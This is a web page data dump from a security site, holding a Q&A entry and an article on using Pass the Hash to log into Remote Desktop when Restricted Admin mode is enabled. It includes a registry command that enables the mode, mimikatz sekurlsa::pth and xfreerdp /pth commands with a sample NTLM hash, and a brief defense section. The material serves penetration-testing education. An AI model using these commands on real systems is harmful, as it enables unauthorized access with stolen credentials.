[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fxGFMamy7Cnzh3jdSr7y3eXBjh_q_AfOMfkgts5ibA54":3},{"id":4,"question":5,"answer":6,"answerHtml":7,"slug":8,"keywords":9,"article":10,"status":34,"aiModel":39,"aiConfidence":39,"updatedAt":52,"createdAt":52,"_status":51},352,"How can mimikatz be used to pass the hash for Remote Desktop when Restricted Admin mode is enabled?","With administrator privileges, run `mimikatz` and execute: `privilege::debug` then `sekurlsa::pth \u002Fuser:administrator \u002Fdomain:remoteserver \u002Fntlm:d25ecd13fddbb542d2e16da4f9e0333d \"\u002Frun:mstsc.exe \u002Frestrictedadmin\"`. This launches the Remote Desktop client with the given hash, and since Restricted Admin mode is enabled on the server, you can log in without needing a password. This technique relies on the client and server both supporting Restricted Admin mode, as explained in [Penetration Techniques - Pass the Hash with Remote Desktop (Restricted Admin Mode)](\u002Fnews\u002Fpenetration-techniques-pass-the-hash-with-remote-desktop-restricted-admin-mode).","\u003Cp>With administrator privileges, run `mimikatz` and execute: `privilege::debug` then `sekurlsa::pth \u002Fuser:administrator \u002Fdomain:remoteserver \u002Fntlm:d25ecd13fddbb542d2e16da4f9e0333d &quot;\u002Frun:mstsc.exe \u002Frestrictedadmin&quot;`. This launches the Remote Desktop client with the given hash, and since Restricted Admin mode is enabled on the server, you can log in without needing a password. This technique relies on the client and server both supporting Restricted Admin mode, as explained in [Penetration Techniques - Pass the Hash with Remote Desktop (Restricted Admin Mode)](\u002Fnews\u002Fpenetration-techniques-pass-the-hash-with-remote-desktop-restricted-admin-mode).\u003C\u002Fp>\u003Cp>\u003Ca href=\"\u002Fnews\u002Fpenetration-techniques-pass-the-hash-with-remote-desktop-restricted-admin-mode\">Read the related One Day Sec article\u003C\u002Fa>\u003C\u002Fp>","how-can-mimikatz-be-used-to-pass-the-hash-for-remote-desktop-when-restricted-adm-1777484074718","mimikatz, Pass the Hash, sekurlsa::pth, Restricted Admin mode, NTLM hash",{"id":11,"title":12,"slug":13,"description":14,"content":15,"contentHtml":30,"cover":31,"author":32,"views":19,"readingTime":33,"status":34,"publishedAt":35,"seo":36,"tags":41,"qaPairs":42,"meta":48,"updatedAt":49,"createdAt":50,"_status":51},89,"Penetration Techniques - Pass the Hash with Remote Desktop (Restricted Admin Mode)","penetration-techniques-pass-the-hash-with-remote-desktop-restricted-admin-mode","Learn how to use Pass the Hash with Remote Desktop in Restricted Admin Mode for penetration testing. Includes setup, mimikatz, and FreeRDP methods.",{"root":16},{"type":17,"format":18,"indent":19,"version":20,"children":21,"direction":29},"root","",0,1,[22],{"type":23,"format":18,"indent":19,"version":20,"children":24,"direction":29},"paragraph",[25],{"mode":26,"text":27,"type":28,"style":18,"detail":19,"format":19,"version":20},"normal","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In penetration testing, if we obtain a user's NTLM hash, we can attempt to use the Pass the Hash method to log into WMI and SMB services, and similarly exploit remote desktop services.\u003C\u002Fp>\u003Cp>This article will introduce the method of using Pass the Hash to log into remote desktop when Restricted Admin Mode is enabled.\u003C\u002Fp>\u003Cp>For reference on Pass the Hash exploitation, see the previous article:\u003C\u002Fp>\u003Cp>Domain Penetration - Implementation of Pass The Hash\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Introduction to Restricted Admin Mode\u003C\u002Fli>\u003Cli>Implementation method of Pass the Hash with Remote Desktop (Restricted Admin Mode)\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Introduction to Restricted Admin Mode\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Official description:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fblogs.technet.microsoft.com\u002Fkfalde\u002F2013\u002F08\u002F14\u002Frestricted-admin-mode-for-rdp-in-windows-8-1-2012-r2\u002F\u003C\u002Fp>\u003Cp>This section references official documentation and includes personal interpretation. Corrections are welcome if any inaccuracies are found.\u003C\u002Fp>\u003Cp>Restricted Admin mode, literally translated as restricted management mode, primarily functions to prevent credentials from being exposed on the target system.\u003C\u002Fp>\u003Ch3>Applicable Systems\u003C\u002Fh3>\u003Cul>\u003Cli>Windows 8.1 and Windows Server 2012 R2 natively support this feature.\u003C\u002Fli>\u003Cli>Windows 7 and Windows Server 2008 R2 do not support it by default; patches 2871997 and 2973351 must be installed.\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Relevant references include:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fsecurity-updates\u002FSecurityAdvisories\u002F2016\u002F2871997\u003C\u002Fp>\u003Cp>https:\u002F\u002Fsupport.microsoft.com\u002Fen-us\u002Fhelp\u002F2973351\u002Fmicrosoft-security-advisory-registry-update-to-improve-credentials-pro\u003C\u002Fp>\u003Ch3>Methods to enable Restricted Admin mode\u003C\u002Fh3>\u003Ch4>Method 1: Install patch 3126593\u003C\u002Fh4>\u003Cp>The implementation principle is the same as Method 2 below (modifying the registry).\u003C\u002Fp>\u003Cp>Reference link:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fsupport.microsoft.com\u002Fen-us\u002Fhelp\u002F2973351\u002Fmicrosoft-security-advisory-registry-update-to-improve-credentials-pro\u003C\u002Fp>\u003Ch4>Method 2: Modify the Registry\u003C\u002Fh4>\u003Cp>Location:\u003C\u002Fp>\u003Cp>HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Lsa\u003C\u002Fp>\u003Cp>Create a new DWORD value named DisableRestrictedAdmin. A value of 0 enables it; a value of 1 disables it.\u003C\u002Fp>\u003Cp>The corresponding command to enable via command line is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>REG ADD \"HKLM\\System\\CurrentControlSet\\Control\\Lsa\" \u002Fv DisableRestrictedAdmin \u002Ft REG_DWORD \u002Fd 00000000 \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>Using Restricted Admin mode\u003C\u002Fh3>\u003Cp>Client command line:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mstsc.exe \u002Frestrictedadmin\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>If the current system does not support Restricted Admin mode, executing the command will display the Remote Desktop parameter description, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018738659_0_b3dcbfaf75.jpeg\">\u003C\u002Fp>\u003Cp>If the current system supports Restricted Admin mode, executing the command will bring up the Remote Desktop login interface, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018747707_1_4f7ddc0e29.jpeg\">\u003C\u002Fp>\u003Cp>It is worth noting that Restricted Admin mode uses the current Windows login credentials, requiring no password input; you can log in directly.\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>When the server enables Restricted Admin mode, the client must also support Restricted Admin mode.\u003C\u002Fp>\u003Cp>Some materials mention that Pass the Hash with Remote Desktop (Restricted Admin mode) applies to Windows 8.1 and Windows Server 2012 R2. This conclusion is not entirely accurate; more precisely, it also applies to Windows 7 and Windows Server 2008 R2 after installing the relevant patches.\u003C\u002Fp>\u003Ch2>0x03 Implementation Method of Pass the Hash with Remote Desktop (Restricted Admin mode)\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Test Environment:\u003C\u002Fp>\u003Cp>Server:\u003C\u002Fp>\u003Cul>\u003Cli>OS: Server 2012 R2\u003C\u002Fli>\u003Cli>IP: 192.168.62.136\u003C\u002Fli>\u003Cli>Computer Name: remoteserver\u003C\u002Fli>\u003Cli>User Name: administrator\u003C\u002Fli>\u003Cli>NTLM hash: d25ecd13fddbb542d2e16da4f9e0333d\u003C\u002Fli>\u003Cli>Restricted Admin mode enabled\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Client:\u003C\u002Fp>\u003Cul>\u003Cli>Supports Restricted Admin mode\u003C\u002Fli>\u003C\u002Ful>\u003Ch3>Method 1: mimikatz\u003C\u002Fh3>\u003Cp>Actually Overpass-the-hash\u003C\u002Fp>\u003Cp>Requires administrator privileges\u003C\u002Fp>\u003Cp>mimikatz command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>privilege::debug\u003Cbr>sekurlsa::pth \u002Fuser:administrator \u002Fdomain:remoteserver \u002Fntlm:d25ecd13fddbb542d2e16da4f9e0333d \"\u002Frun:mstsc.exe \u002Frestrictedadmin\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>After execution, the remote login interface pops up, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fuploads\u002Fdocx_image_1770018756185_2_04aee6fedc.jpeg\">\u003C\u002Fp>\u003Cp>Select connect, successfully achieve remote login\u003C\u002Fp>\u003Ch3>Method 2: FreeRDP\u003C\u002Fh3>\u003Cp>Download address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FFreeRDP\u003C\u002Fp>\u003Cp>Reference articles:\u003C\u002Fp>\u003Cp>https:\u002F\u002Flabs.portcullis.co.uk\u002Fblog\u002Fnew-restricted-admin-feature-of-rdp-8-1-allows-pass-the-hash\u002F\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.kali.org\u002Fpenetration-testing\u002Fpassing-hash-remote-desktop\u002F\u003C\u002Fp>\u003Cp>FreeRDP implements the Remote Desktop Protocol, supports passing hash\u003C\u002Fp>\u003Cp>Supports Linux, Windows, and MAC. Download links are as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FFreeRDP\u002FFreeRDP\u002Fwiki\u002FPreBuilds\u003C\u002Fp>\u003Ch4>Actual testing:\u003C\u002Fh4>\u003Cp>(1) Parameters for remote login using plaintext on Linux:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>xfreerdp \u002Fu:administrator \u002Fp:test123! \u002Fv:192.168.62.136 \u002Fcert-ignore\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Test successful\u003C\u002Fp>\u003Cp>(2) Parameters for remote login using hash on Linux:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>xfreerdp \u002Fu:administrator \u002Fpth:d25ecd13fddbb542d2e16da4f9e0333d \u002Fv:192.168.62.136 \u002Fcert-ignore\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Test failed\u003C\u002Fp>\u003Cp>Same test results on Windows\u003C\u002Fp>\u003Cp>Suspect that FreeRDP removed this feature; others have similar test results. Links are as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fnullsec.us\u002Frdp-sessions-with-xfreerdp-using-pth\u002F\u003C\u002Fp>\u003Cp>https:\u002F\u002Ftwitter.com\u002Fegyp7\u002Fstatus\u002F776053410231558148\u003C\u002Fp>\u003Ch4>Solution:\u003C\u002Fh4>\u003Cp>Download link for the older version of FreeRDP that includes the pth feature:\u003C\u002Fp>\u003Cp>https:\u002F\u002Flabs.portcullis.co.uk\u002Fdownload\u002FFreeRDP-pth.tar.gz\u003C\u002Fp>\u003Cp>Requires recompilation to support the pth parameter\u003C\u002Fp>\u003Ch2>0x04 Defense Detection\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Restricted Admin mode was originally designed to enhance system security, but it inadvertently supports Pass the Hash exploitation\u003C\u002Fp>\u003Cp>Therefore, for defense, focus on preventing Pass the Hash exploitation; enabling Restricted Admin mode helps improve system security\u003C\u002Fp>\u003Cp>Refer to the official Microsoft documentation at the following address:\u003C\u002Fp>\u003Cp>http:\u002F\u002Fwww.microsoft.com\u002Fen-us\u002Fdownload\u002Fdetails.aspx?id=36036\u003C\u002Fp>\u003Ch2>0x05 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the method of Pass the Hash with Remote Desktop under specific conditions (Server must have Restricted Admin mode enabled, Client must support Restricted Admin mode), and explains key aspects of Restricted Admin mode.\u003C\u002Fp>\u003Cp>The general method for Pass the Hash with Remote Desktop will be covered in a subsequent article.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>","text","ltr","\u003Chtml>\u003Chead>\u003C\u002Fhead>\u003Cbody>\u003Ch2>0x00 Preface\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>In penetration testing, if we obtain a user's NTLM hash, we can attempt to use the Pass the Hash method to log into WMI and SMB services, and similarly exploit remote desktop services.\u003C\u002Fp>\u003Cp>This article will introduce the method of using Pass the Hash to log into remote desktop when Restricted Admin Mode is enabled.\u003C\u002Fp>\u003Cp>For reference on Pass the Hash exploitation, see the previous article:\u003C\u002Fp>\u003Cp>Domain Penetration - Implementation of Pass The Hash\u003C\u002Fp>\u003Ch2>0x01 Introduction\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article will cover the following:\u003C\u002Fp>\u003Cul>\u003Cli>Introduction to Restricted Admin Mode\u003C\u002Fli>\u003Cli>Implementation method of Pass the Hash with Remote Desktop (Restricted Admin Mode)\u003C\u002Fli>\u003C\u002Ful>\u003Ch2>0x02 Introduction to Restricted Admin Mode\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Official description:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fblogs.technet.microsoft.com\u002Fkfalde\u002F2013\u002F08\u002F14\u002Frestricted-admin-mode-for-rdp-in-windows-8-1-2012-r2\u002F\u003C\u002Fp>\u003Cp>This section references official documentation and includes personal interpretation. Corrections are welcome if any inaccuracies are found.\u003C\u002Fp>\u003Cp>Restricted Admin mode, literally translated as restricted management mode, primarily functions to prevent credentials from being exposed on the target system.\u003C\u002Fp>\u003Ch3>Applicable Systems\u003C\u002Fh3>\u003Cul>\u003Cli>Windows 8.1 and Windows Server 2012 R2 natively support this feature.\u003C\u002Fli>\u003Cli>Windows 7 and Windows Server 2008 R2 do not support it by default; patches 2871997 and 2973351 must be installed.\u003C\u002Fli>\u003C\u002Ful>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Relevant references include:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fdocs.microsoft.com\u002Fen-us\u002Fsecurity-updates\u002FSecurityAdvisories\u002F2016\u002F2871997\u003C\u002Fp>\u003Cp>https:\u002F\u002Fsupport.microsoft.com\u002Fen-us\u002Fhelp\u002F2973351\u002Fmicrosoft-security-advisory-registry-update-to-improve-credentials-pro\u003C\u002Fp>\u003Ch3>Methods to enable Restricted Admin mode\u003C\u002Fh3>\u003Ch4>Method 1: Install patch 3126593\u003C\u002Fh4>\u003Cp>The implementation principle is the same as Method 2 below (modifying the registry).\u003C\u002Fp>\u003Cp>Reference link:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fsupport.microsoft.com\u002Fen-us\u002Fhelp\u002F2973351\u002Fmicrosoft-security-advisory-registry-update-to-improve-credentials-pro\u003C\u002Fp>\u003Ch4>Method 2: Modify the Registry\u003C\u002Fh4>\u003Cp>Location:\u003C\u002Fp>\u003Cp>HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Lsa\u003C\u002Fp>\u003Cp>Create a new DWORD value named DisableRestrictedAdmin. A value of 0 enables it; a value of 1 disables it.\u003C\u002Fp>\u003Cp>The corresponding command to enable via command line is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>REG ADD \"HKLM\\System\\CurrentControlSet\\Control\\Lsa\" \u002Fv DisableRestrictedAdmin \u002Ft REG_DWORD \u002Fd 00000000 \u002Ff\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Ch3>Using Restricted Admin mode\u003C\u002Fh3>\u003Cp>Client command line:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>mstsc.exe \u002Frestrictedadmin\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>If the current system does not support Restricted Admin mode, executing the command will display the Remote Desktop parameter description, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018738659_0_b3dcbfaf75-1.jpeg\">\u003C\u002Fp>\u003Cp>If the current system supports Restricted Admin mode, executing the command will bring up the Remote Desktop login interface, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018747707_1_4f7ddc0e29-1.jpeg\">\u003C\u002Fp>\u003Cp>It is worth noting that Restricted Admin mode uses the current Windows login credentials, requiring no password input; you can log in directly.\u003C\u002Fp>\u003Cp>\u003Cstrong>Note:\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>When the server enables Restricted Admin mode, the client must also support Restricted Admin mode.\u003C\u002Fp>\u003Cp>Some materials mention that Pass the Hash with Remote Desktop (Restricted Admin mode) applies to Windows 8.1 and Windows Server 2012 R2. This conclusion is not entirely accurate; more precisely, it also applies to Windows 7 and Windows Server 2008 R2 after installing the relevant patches.\u003C\u002Fp>\u003Ch2>0x03 Implementation Method of Pass the Hash with Remote Desktop (Restricted Admin mode)\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Test Environment:\u003C\u002Fp>\u003Cp>Server:\u003C\u002Fp>\u003Cul>\u003Cli>OS: Server 2012 R2\u003C\u002Fli>\u003Cli>IP: 192.168.62.136\u003C\u002Fli>\u003Cli>Computer Name: remoteserver\u003C\u002Fli>\u003Cli>User Name: administrator\u003C\u002Fli>\u003Cli>NTLM hash: d25ecd13fddbb542d2e16da4f9e0333d\u003C\u002Fli>\u003Cli>Restricted Admin mode enabled\u003C\u002Fli>\u003C\u002Ful>\u003Cp>Client:\u003C\u002Fp>\u003Cul>\u003Cli>Supports Restricted Admin mode\u003C\u002Fli>\u003C\u002Ful>\u003Ch3>Method 1: mimikatz\u003C\u002Fh3>\u003Cp>Actually Overpass-the-hash\u003C\u002Fp>\u003Cp>Requires administrator privileges\u003C\u002Fp>\u003Cp>mimikatz command is as follows:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>privilege::debug\u003Cbr>sekurlsa::pth \u002Fuser:administrator \u002Fdomain:remoteserver \u002Fntlm:d25ecd13fddbb542d2e16da4f9e0333d \"\u002Frun:mstsc.exe \u002Frestrictedadmin\"\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>After execution, the remote login interface pops up, as shown in the figure below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770018756185_2_04aee6fedc-1.jpeg\">\u003C\u002Fp>\u003Cp>Select connect, successfully achieve remote login\u003C\u002Fp>\u003Ch3>Method 2: FreeRDP\u003C\u002Fh3>\u003Cp>Download address:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FFreeRDP\u003C\u002Fp>\u003Cp>Reference articles:\u003C\u002Fp>\u003Cp>https:\u002F\u002Flabs.portcullis.co.uk\u002Fblog\u002Fnew-restricted-admin-feature-of-rdp-8-1-allows-pass-the-hash\u002F\u003C\u002Fp>\u003Cp>https:\u002F\u002Fwww.kali.org\u002Fpenetration-testing\u002Fpassing-hash-remote-desktop\u002F\u003C\u002Fp>\u003Cp>FreeRDP implements the Remote Desktop Protocol, supports passing hash\u003C\u002Fp>\u003Cp>Supports Linux, Windows, and MAC. Download links are as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fgithub.com\u002FFreeRDP\u002FFreeRDP\u002Fwiki\u002FPreBuilds\u003C\u002Fp>\u003Ch4>Actual testing:\u003C\u002Fh4>\u003Cp>(1) Parameters for remote login using plaintext on Linux:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>xfreerdp \u002Fu:administrator \u002Fp:test123! \u002Fv:192.168.62.136 \u002Fcert-ignore\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Test successful\u003C\u002Fp>\u003Cp>(2) Parameters for remote login using hash on Linux:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>xfreerdp \u002Fu:administrator \u002Fpth:d25ecd13fddbb542d2e16da4f9e0333d \u002Fv:192.168.62.136 \u002Fcert-ignore\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Test failed\u003C\u002Fp>\u003Cp>Same test results on Windows\u003C\u002Fp>\u003Cp>Suspect that FreeRDP removed this feature; others have similar test results. Links are as follows:\u003C\u002Fp>\u003Cp>https:\u002F\u002Fnullsec.us\u002Frdp-sessions-with-xfreerdp-using-pth\u002F\u003C\u002Fp>\u003Cp>https:\u002F\u002Ftwitter.com\u002Fegyp7\u002Fstatus\u002F776053410231558148\u003C\u002Fp>\u003Ch4>Solution:\u003C\u002Fh4>\u003Cp>Download link for the older version of FreeRDP that includes the pth feature:\u003C\u002Fp>\u003Cp>https:\u002F\u002Flabs.portcullis.co.uk\u002Fdownload\u002FFreeRDP-pth.tar.gz\u003C\u002Fp>\u003Cp>Requires recompilation to support the pth parameter\u003C\u002Fp>\u003Ch2>0x04 Defense Detection\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Restricted Admin mode was originally designed to enhance system security, but it inadvertently supports Pass the Hash exploitation\u003C\u002Fp>\u003Cp>Therefore, for defense, focus on preventing Pass the Hash exploitation; enabling Restricted Admin mode helps improve system security\u003C\u002Fp>\u003Cp>Refer to the official Microsoft documentation at the following address:\u003C\u002Fp>\u003Cp>http:\u002F\u002Fwww.microsoft.com\u002Fen-us\u002Fdownload\u002Fdetails.aspx?id=36036\u003C\u002Fp>\u003Ch2>0x05 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces the method of Pass the Hash with Remote Desktop under specific conditions (Server must have Restricted Admin mode enabled, Client must support Restricted Admin mode), and explains key aspects of Restricted Admin mode.\u003C\u002Fp>\u003Cp>The general method for Pass the Hash with Remote Desktop will be covered in a subsequent article.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",1353,"Onedaysec",4,"published","2026-02-02T08:05:51.864Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"Pass the Hash with Remote Desktop: Restricted Admin Mode Guide","pass the hash, remote desktop, restricted admin mode, penetration testing, NTLM hash, mimikatz, FreeRDP, Windows security, RDP exploitation",null,false,[],{"docs":43,"hasNextPage":40},[44,45,4,46,47],354,353,351,350,{"title":39,"description":39,"image":39},"2026-07-24T15:37:13.989Z","2026-07-23T16:01:25.158Z","draft","2026-07-23T16:05:33.189Z"]